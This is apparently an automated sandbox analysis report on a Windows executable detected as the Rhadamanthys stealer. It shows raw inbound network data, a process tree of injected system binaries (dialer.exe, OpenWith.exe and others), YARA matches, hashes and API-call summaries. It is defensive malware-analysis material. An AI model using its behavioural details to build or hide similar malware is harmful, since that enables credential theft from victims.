/O-}WPls}dU8wq}}B}}}pG}}6W}}lqc~QGcW}}}s<}}f<}di}}}p}}{t}}cT}{i}wo8}3jEl}nKk6G}}ZW}}>G}}W}}}k}d@kqdJ}}}9JWddLq}R}}dd}}{5}}dW}}u}2!q}x~p<}korwG}}5}}}x}}}~}}}0}ch>}{2}}{>Iq{-T}cH}}{l}}cd}}}X}pu}uXS}pGIJ}p7~@q}}NG}}1G}}Rq}}K}d@RWcf}}c5-GdpRq}x}}dY}}{O}}cj}pu
2024-05-24 03:09:40 UTC	12883	IN	Data Raw: 33 47 7d 7d 7c 71 7d 7d 77 47 7d 7d 52 47 7d 70 69 47 64 7e 7d 7d 7b 4e 6c 57 63 38 40 71 7b 55 7d 7d 7b 6b 7d 7d 7d 34 7d 7d 7b 66 7d 6b 30 7d 3c 36 38 7d 30 55 65 5a 7d 63 7d 40 4f 7d 7d 7d 6c 7d 7d 7d 2d 57 7d 7d 76 47 7d 7d 7e 71 7b 63 4c 47 63 7b 7d 7d 63 37 51 71 63 58 65 7d 7d 6a 7d 7d 64 32 7d 7d 63 49 7d 7d 64 5a 7d 6f 4f 7d 2f 5a 7d 7d 76 35 4e 70 7d 63 40 6a 78 7d 7d 7d 37 71 7d 7d 58 47 7d 7d 31 47 7d 7d 66 7d 63 30 4d 57 64 52 7d 7d 7b 50 36 7d 7b 52 4f 7d 64 48 7d 7d 7b 31 7d 7d 7b 34 7d 7d 7d 52 7d 68 69 7d 6a 47 53 7d 7e 69 6f 63 7d 64 3e 21 51 47 7d 7d 47 57 7d 7d 33 47 7d 7d 57 71 7d 7d 6f 47 7d 53 53 7d 7b 45 7d 7d 7d 59 71 57 63 4c 55 7d 7b 37 7d 7d 7b 51 7d 7d 64 3c 7d 7d 7b 47 7d 6c 71 7d 4f 37 53 7d 6c 44 53 49 7d 6c 74 74 38 7d 7d Data Ascii: 3G}}\|q}}wG}}RG}piGd~}}{NlWc8@q{U}}{k}}}4}}{f}k0}<68}0UeZ}c}@O}}}l}}}-W}}vG}}~q{cLGc{}}c7QqcXe}}j}}d2}}cI}}dZ}oO}/Z}}v5Np}c@jx}}}7q}}XG}}1G}}f}c0MWdR}}{P6}{RO}dH}}{1}}{4}}}R}hi}jGS}~ioc}d>!QG}}GW}}3G}}Wq}}oG}SS}{E}}}YqWcLU}{7}}{Q}}d<}}{G}lq}O7S}lDSI}ltt8}}
2024-05-24 03:09:40 UTC	3501	IN	Data Raw: 51 7d 7d 7d 38 7d 7d 7b 66 7d 7d 64 4a 7d 64 65 34 7d 65 2d 7d 7d 6c 2f 70 7d 7d 75 54 7d 2f 7c 7d 7d 6e 57 7d 7d 6e 7d 7d 7d 6c 30 7d 54 71 7d 35 32 7d 7b 6c 50 69 65 7d 58 4a 4b 49 7d 7d 64 75 7d 7d 7d 76 7d 7d 64 39 7d 7d 7b 52 7d 64 54 65 7d 66 65 7d 7d 2f 7c 37 7d 69 36 37 7d 68 53 7d 7d 69 69 7d 7d 6e 4b 7d 7d 65 53 7d 77 7d 7b 7e 57 47 63 58 2f 40 71 7d 73 3c 66 48 7d 7d 64 21 7d 7d 64 4c 7d 7d 64 71 7d 7d 64 51 7d 70 36 76 7d 6a 53 7d 7d 2f 3e 6c 7d 68 47 36 7d 63 71 7d 7d 6e 47 7d 7d 69 75 7d 7d 6e 65 7d 34 47 64 7c 65 71 7b 63 51 42 71 7d 42 56 4c 7d 7d 7d 7b 2f 7d 7d 7b 6b 7d 7d 7d 32 7d 7d 7b 55 7d 69 52 72 7d 7d 65 7d 7d 6a 42 52 7d 6f 6e 71 7d 7b 71 7d 7d 69 65 7d 7d 6c 30 7d 7d 63 4b 7d 48 57 7b 2f 6b 47 64 69 75 72 75 7d 7b 6e 32 21 7d 7d Data Ascii: Q}}}8}}{f}}dJ}de4}e-}}l/p}}uT}/\|}}nW}}n}}}l0}Tq}52}{lPie}XJKI}}du}}}v}}d9}}{R}dTe}fe}}/\|7}i67}hS}}ii}}nK}}eS}w}{~WGcX/@q}s<fH}}d!}}dL}}dq}}dQ}p6v}jS}}/>l}hG6}cq}}nG}}iu}}ne}4Gd\|eq{cQBq}BVL}}}{/}}{k}}}2}}{U}iRr}}e}}jBR}onq}{q}}ie}}l0}}cK}HW{/kGdiuru}{n2!}}
2024-05-24 03:09:40 UTC	3739	IN	Data Raw: 7d 7e 6c 40 7d 66 57 21 7d 6e 2f 7d 7d 6b 2f 7d 7d 6c 53 7d 7d 7e 65 7d 44 7d 7d 2f 7b 47 63 4e 6a 2d 34 7d 52 32 76 3c 7d 7d 7b 75 7d 7d 7d 36 7d 7d 64 30 7d 7d 64 4e 7d 6b 69 65 7d 7e 47 7d 7d 70 75 37 7d 64 59 4f 7d 6a 2f 7d 7d 69 4f 7d 7d 6b 7d 7d 7d 7d 65 7d 4b 71 7b 75 39 71 64 31 56 58 2f 7d 36 2f 7c 70 7d 7d 63 42 7d 7d 64 33 7d 7d 64 36 7d 7d 64 64 7d 68 47 72 7d 7b 2f 7d 7d 7d 35 6b 7d 7d 34 59 7d 6e 53 7d 7d 6b 65 7d 7d 70 34 7d 7d 7e 34 7d 46 57 63 53 78 7d 63 4f 21 7c 4f 7d 55 2f 78 68 7d 7d 7b 50 7d 7d 7d 45 7d 7d 7d 56 7d 7d 63 45 7d 70 50 7d 7d 6f 4b 7d 7d 6e 75 53 7d 2f 4e 31 7d 7e 30 7d 7d 70 57 7d 7d 6a 7d 7d 7d 2f 4f 7d 54 57 64 32 4a 71 7b 42 50 39 7c 7d 44 5a 33 44 7d 7d 63 73 7d 7d 7d 59 7d 7d 63 55 7d 7d 7d 4b 7d 6e 50 4f 7d 65 7d Data Ascii: }~l@}fW!}n/}}k/}}lS}}~e}D}}/{GcNj-4}R2v<}}{u}}}6}}d0}}dN}kie}~G}}pu7}dYO}j/}}iO}}k}}}}e}Kq{u9qd1VX/}6/\|p}}cB}}d3}}d6}}dd}hGr}{/}}}5k}}4Y}nS}}ke}}p4}}~4}FWcSx}cO!\|O}U/xh}}{P}}}E}}}V}}cE}pP}}oK}}nuS}/N1}~0}}pW}}j}}}/O}TWd2Jq{BP9\|}DZ3D}}cs}}}Y}}cU}}}K}nPO}e}

Target ID:	0
Start time:	23:09:13
Start date:	23/05/2024
Path:	C:\Users\user\Desktop\nF54KOU30R.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nF54KOU30R.exe"
Imagebase:	0x550000
File size:	5'007'872 bytes
MD5 hash:	EA37157EE7AB8AFB57A0F8E09AFC8BEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:09:42
Start date:	23/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x620000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:09:44
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\dialer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\dialer.exe"
Imagebase:	0x40000
File size:	32'256 bytes
MD5 hash:	E4BD77FB64DDE78F1A95ECE09F6A9B85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:09:44
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516
Imagebase:	0x7ff71e800000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	23:09:44
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 552
Imagebase:	0xb50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	23:09:48
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1864
Imagebase:	0xb50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	23:09:48
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Imagebase:	0xb50000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	23:09:50
Start date:	23/05/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\openwith.exe"
Imagebase:	0x7ff720a80000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	23:10:14
Start date:	23/05/2024
Path:	C:\Program Files\Windows Media Player\wmplayer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\wmplayer.exe"
Imagebase:	0x7ff7ae110000
File size:	171'008 bytes
MD5 hash:	89DCD2D4C0EC638AADC00D3530E07E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	23:10:17
Start date:	23/05/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\dllhost.exe"
Imagebase:	0x7ff70f330000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 03DB22CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,?,?), ref: 03DB2311

Part of subcall function 03DB2098: VirtualAlloc.KERNEL32(00000000,00001012,00001000,00000004), ref: 03DB20C1
Part of subcall function 03DB2098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 03DB226D

VirtualAlloc.KERNEL32(00000000,00400000,00001000,00000004), ref: 03DB2363
VirtualProtect.KERNEL32(0000002C,?,00000040,0000002C), ref: 03DB23BD
VirtualFree.KERNELBASE(00000000,00000000,?), ref: 03DB23F0

Strings

,, xrefs: 03DB2341

Memory Dump Source

Source File: 00000000.00000003.1979370491.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_3d60000_nF54KOU30R.jbxd

Similarity

API ID: Virtual$Alloc$Free$Protect
String ID: ,
API String ID: 1004437363-3772416878
Opcode ID: 15a4efe748f616053fe8ffffddab00f5333e8782292edb7e0670b88d1d28ae77
Instruction ID: ba76917bed26479c16ede5720176ac861bd5c25841a2b8c0346cb8b6d7fc9ec6
Opcode Fuzzy Hash: 15a4efe748f616053fe8ffffddab00f5333e8782292edb7e0670b88d1d28ae77
Instruction Fuzzy Hash: AA410C76900709EFCB10DFA9C880ADEBBF4FF08754F14891AE95AA7640D370E954CB64

Function 03DB0AA0 Relevance: 4.8, APIs: 3, Instructions: 275memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00100000,01000000,?,?,?,?,?,?,?,03DB0FEE,03DB0A02,03DC20E0,03DB0A02,00000000), ref: 03DB0AAF

Part of subcall function 03DB0E50: RtlAllocateHeap.NTDLL(00000000), ref: 03DB0E6A

RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,03DB0FEE,03DB0A02,03DC20E0,03DB0A02,00000000), ref: 03DB0CDF
VirtualFree.KERNELBASE(?,00000000,?), ref: 03DB0E11

Memory Dump Source

Source File: 00000000.00000003.1979370491.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_3d60000_nF54KOU30R.jbxd

Similarity

API ID: Heap$Allocate$CreateFreeVirtual
String ID:
API String ID: 1332632918-0
Opcode ID: fbb3dd1b7076f29dd2f9bbfa3039cbdd9bca1cbbd755b6ada53c74d20c3f8360
Instruction ID: 8580b1ad32dfe8fc5d90c3aa986c3628eee83ba4cbcd6c304bf62b950c47eac6
Opcode Fuzzy Hash: fbb3dd1b7076f29dd2f9bbfa3039cbdd9bca1cbbd755b6ada53c74d20c3f8360
Instruction Fuzzy Hash: 69B18871914346DFDB10DF68C844BABBBF5BB88744F08892DF98A87291DB70E814CB51

Function 03DB0E50 Relevance: 3.1, APIs: 2, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 03DB0E6A
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 03DB0F91

Memory Dump Source

Source File: 00000000.00000003.1979370491.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_3d60000_nF54KOU30R.jbxd

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: 504da417f6f38c8e9a050de285756e009b1def62c18219398ec6d6bf2cff73d1
Instruction ID: c5a5e01fb5cdc61c09599177c8d28f2fae82b89369ddd2a16dc19fa0af9e81f2
Opcode Fuzzy Hash: 504da417f6f38c8e9a050de285756e009b1def62c18219398ec6d6bf2cff73d1
Instruction Fuzzy Hash: FF412B36724302DBEB20E6A4AC45FFB73BCEB88B51F18042AFA06D6180EB65D455D371

Function 03DB2098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001012,00001000,00000004), ref: 03DB20C1
VirtualFree.KERNELBASE(00000000,00000000,?), ref: 03DB226D

Memory Dump Source

Source File: 00000000.00000003.1979370491.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_3d60000_nF54KOU30R.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 626710dd4696aa566f375db524090cb02fea0ee4e50da9c90c6b42f5adaa7836
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 8F719B72E04249DFCB41CF98C881BEEBBF0AF09314F184495E5A6FB241C234AA91DF64

Non-executed Functions

Function 03DB2277 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1979370491.0000000003D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_3d60000_nF54KOU30R.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction ID: da19d879c5fc92c5c1b4532e35fbbab070a9eaaafcc2b5d496c88dbba9b684bd
Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
Instruction Fuzzy Hash: 21F0627AA00208CFC714CF09C548CD5B7F6FB85B1076949A5E446DB221D3B0DE44CB61

Analysis Process: dialer.exePID: 8032, Parent PID: 2032COMMON

Executed Functions

Function 025D02D4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 025D031C

Part of subcall function 025D00A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 025D00C9
Part of subcall function 025D00A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 025D0275

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 025D036E
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 025D03DD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 025D03FD
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 025D0424
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025D044C
FindCloseChangeNotification.KERNELBASE(?), ref: 025D0467

Strings

,, xrefs: 025D034C

Memory Dump Source

Source File: 00000005.00000003.1932991708.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_25d0000_dialer.jbxd

Similarity

API ID: Virtual$Alloc$Free$ChangeCloseFileFindNotificationProtectView
String ID: ,
API String ID: 2870039258-3772416878
Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
Instruction ID: 87455698c12bde6fa3715c8df46fee30da282b64fe96d373209a786c53a72d39
Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
Instruction Fuzzy Hash: 70510DB5900209EFCB20DFA9C884EAEBBB9FF08354F508429F955A7280D770E950CF64

Function 025D00A0 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 025D00C9
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 025D0275

Memory Dump Source

Source File: 00000005.00000003.1932991708.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 025D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_25d0000_dialer.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 4d645d195465661cc42ce9c93c4fc792b87fd02732aa4da256f32570279bf0dd
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: 35718A71E0524A9FDB51CF98C981BEEBBF0BB09315F144495E465FB281C334AA91CF68

Analysis Process: OpenWith.exePID: 6012, Parent PID: 2032COMMON

Execution Graph

Execution Coverage:	34.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	73.3%
Total number of Nodes:	30
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007DF4E57592CC Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 544nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00007DF4E57593A2
DuplicateHandle.KERNELBASE ref: 00007DF4E5759454
NtAcceptConnectPort.NTDLL ref: 00007DF4E57594FF
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5759517
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759558
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759597
NtAcceptConnectPort.NTDLL ref: 00007DF4E57595DE
NtAcceptConnectPort.NTDLL ref: 00007DF4E575961B
NtAcceptConnectPort.NTDLL ref: 00007DF4E57596A1
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759700
NtAcceptConnectPort.NTDLL ref: 00007DF4E57597E6
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759820
NtAcceptConnectPort.NTDLL ref: 00007DF4E575984D

Strings

,, xrefs: 00007DF4E57593D2
H, xrefs: 00007DF4E5759768
H, xrefs: 00007DF4E5759783

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$??3@DuplicateHandle
String ID: ,$H$H
API String ID: 3302331534-438696205
Opcode ID: 67510fd6fdd56d9b96e64f6ba96e117005d354361ef70f9a43da91e85e8a0e9e
Instruction ID: 717e7e10655d5f659dcbdaae47779c1f6bd04290c8f3a0dfc38c7f3c76bdb1d8
Opcode Fuzzy Hash: 67510fd6fdd56d9b96e64f6ba96e117005d354361ef70f9a43da91e85e8a0e9e
Instruction Fuzzy Hash: 85028730A1CA888BD764DF58D8857ABB7E1FB98301F10453ED58FC3291DA74E965CB82

Function 00007DF4E5759AF4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156nativeCOMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E5759B1A
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759BC3
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759C84
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5759C89

Strings

0, xrefs: 00007DF4E5759B66
@, xrefs: 00007DF4E5759B7C
, xrefs: 00007DF4E5759BB3

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$??3@_malloc_dbg
String ID: $0$@
API String ID: 2460957884-2347541974
Opcode ID: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
Instruction ID: cbac8c25bc9ac3c64daf9bedf70193931e1981d2461e8199c4ab12249ee75630
Opcode Fuzzy Hash: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
Instruction Fuzzy Hash: 4751733092C7888FD764DF28D4857AAB7E0FB89304F10452EE48EC6251DB74E895CB83

Function 000001F0D55130C7 Relevance: 10.9, APIs: 7, Instructions: 390memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 000001F0D5513810
RtlAllocateHeap.NTDLL ref: 000001F0D551386D
NtAcceptConnectPort.NTDLL ref: 000001F0D5513957
NtAcceptConnectPort.NTDLL ref: 000001F0D55139E4
NtAcceptConnectPort.NTDLL ref: 000001F0D5513AA3
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001F0D5513AC0
RtlDeleteBoundaryDescriptor.NTDLL ref: 000001F0D5513AD2

Memory Dump Source

Source File: 0000000F.00000003.2029886306.000001F0D5510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D5510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_1f0d5510000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
String ID:
API String ID: 3472209132-0
Opcode ID: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
Instruction ID: 3a53071b35ad1449b26ddb9457ae199c3c02f20a2df1c2c3bbbd3d93632de4f6
Opcode Fuzzy Hash: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
Instruction Fuzzy Hash: BBC18230218F098BDF59EF98C495BB9B7E1FBD8350F01452DE88AC7256DB35E8858B81

Function 00007DF4E574BEC4 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 514COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E574B2B8: _malloc_dbg.MSVCRT ref: 00007DF4E574B366

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E574C3EC

Strings

\, xrefs: 00007DF4E574C359
A, xrefs: 00007DF4E574BFAF
:, xrefs: 00007DF4E574BFB9
\, xrefs: 00007DF4E574BFC3

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@_malloc_dbg
String ID: :$A$\$\
API String ID: 149304988-2970747007
Opcode ID: 83d8402dff79a468abd132d2b0fde87248dcdb5c4a335f31b70b5c2ad7778e51
Instruction ID: f9ee68fb4db6daaafb5f27934214cc5cbd2a71a5cba0e9fb0fd3a267cdff4d31
Opcode Fuzzy Hash: 83d8402dff79a468abd132d2b0fde87248dcdb5c4a335f31b70b5c2ad7778e51
Instruction Fuzzy Hash: AC02903161CA888FEB68EF18D885BEA77E1FF94300F14052ED54FD7161DA78E9618B81

Function 00007DF4E5759CA0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4E5759CC1
NtAcceptConnectPort.NTDLL ref: 00007DF4E5759D6E

Strings

@, xrefs: 00007DF4E5759D22
0, xrefs: 00007DF4E5759D0C
, xrefs: 00007DF4E5759D5E

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: AcceptConnectPort_calloc_dbg
String ID: $0$@
API String ID: 3053611130-2347541974
Opcode ID: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
Instruction ID: e911181769abbd0474a70654bb4e35488e7576d888b17f7a8cd84a87bd9efbcf
Opcode Fuzzy Hash: 2efbfb43f5b264e98edc7990400f44a606071b03ecf31d8e2d45c18cdd4aafd7
Instruction Fuzzy Hash: 40512A31A0CB898FE765DB68D8847ABB7E5FB94341F10452EA48EC3250DB74D854CB42

Function 00007DF4E5745BD8 Relevance: 6.7, APIs: 4, Instructions: 747COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E57339D4: _malloc_dbg.MSVCRT ref: 00007DF4E57339FD

_calloc_dbg.MSVCRT ref: 00007DF4E5745E3A
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5745EA1
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E574638E
VirtualFree.KERNELBASE ref: 00007DF4E57463E0

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@$FreeVirtual_calloc_dbg_malloc_dbg
String ID:
API String ID: 2435629650-0
Opcode ID: aae81571bd27c63e3009cb726d59ebe1a4043ba694c735212d7732e4a1a5a2b6
